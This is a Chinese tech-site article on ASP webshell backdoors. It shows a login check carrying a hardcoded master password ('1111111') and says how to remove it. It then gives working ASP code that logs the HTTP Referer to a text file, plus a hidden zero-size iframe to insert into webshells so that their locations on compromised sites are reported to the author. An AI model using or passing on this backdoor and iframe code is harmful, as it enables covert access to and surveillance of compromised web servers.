知识屋:更实用的电脑技术知识网站
知识屋 手机游戏 手机软件 电脑软件 最近更新 手机端
冒险村物语 英雄无敌3塔防 驾考家园手游
password怎么用?p 诺诺视频会议怎 网易UU网游加速
所在位置:首页 > 网络安全 > 安全资讯

揭密如何写ASP木马后门

发布时间:2011-04-04 11:53:54作者:知识屋

 正常的:

 

  1. EnD fUNCtION  
  2. IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  
  3. IF requeSt.FoRM("pass")<>"" TheN  
  4. iF REquesT.foRM("pass")=uSERPASS Then  
  5. SEsSIoN("web2a2dmin")=uSERPAss  
  6. rESPOnsE.rEdirEct Url  
  7. ELse  
  8. rrs"对不起,密码验证失败!" 

加有万能密码的:

 

  1. EnD fUNCtION  
  2. IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  
  3. IF requeSt.FoRM("pass")<>"" TheN  
  4. iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then  
  5. SEsSIoN("web2a2dmin")=uSERPAss  
  6. rESPOnsE.rEdirEct Url  
  7. ELse  
  8. rrs"对不起,密码验证失败!" 

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

 

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

 

  1. <%url=Request.ServerVariables("HTTP_Referer")  
  2. set fs=server.CreateObject("Scripting.FileSystemObject")  
  3. set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)  
  4. file.writeline url  
  5. file.close  
  6. set file=nothing 
  7. set fs=nothing [!--empirenews.page--]分页标题[/!--empirenews.page--]
  8. %> 

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

 

  1. <iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe> 

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏

上一篇:webshell整站打包工具完美版(FSO支持)-ASP版本

下一篇:入侵渗透中的一些技巧和思路

相关知识

软件推荐

更多 >

游戏推荐

更多 >

精选栏目

热门推荐

  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜

手机游戏

手机软件

电脑软件

猜你喜欢

街机 魔幻 传奇 节奏 赛车 学习 抢票 解谜 放置 铃声 美食 借钱 竞速 手机美化 购物 漫画 投屏 英语口语 剧情 母婴 生活 挂机 社交 不上征信 系统软件 网贷借钱 彩票 换装 宫斗 拍照 教育 沙盒 竞技 二次元 武侠 RPG 体育 舞蹈 导航 通讯 策略 办公 网易 360 旅游 联机 健康 影音 即时 抢红包

本站所有软件来自互联网,版权归原著所有。如有侵权,敬请来信告知,我们将及时撤销。

知识屋 www.zhishiwu.com 更实用的电脑技术知识网站

苏ICP备14019037号-7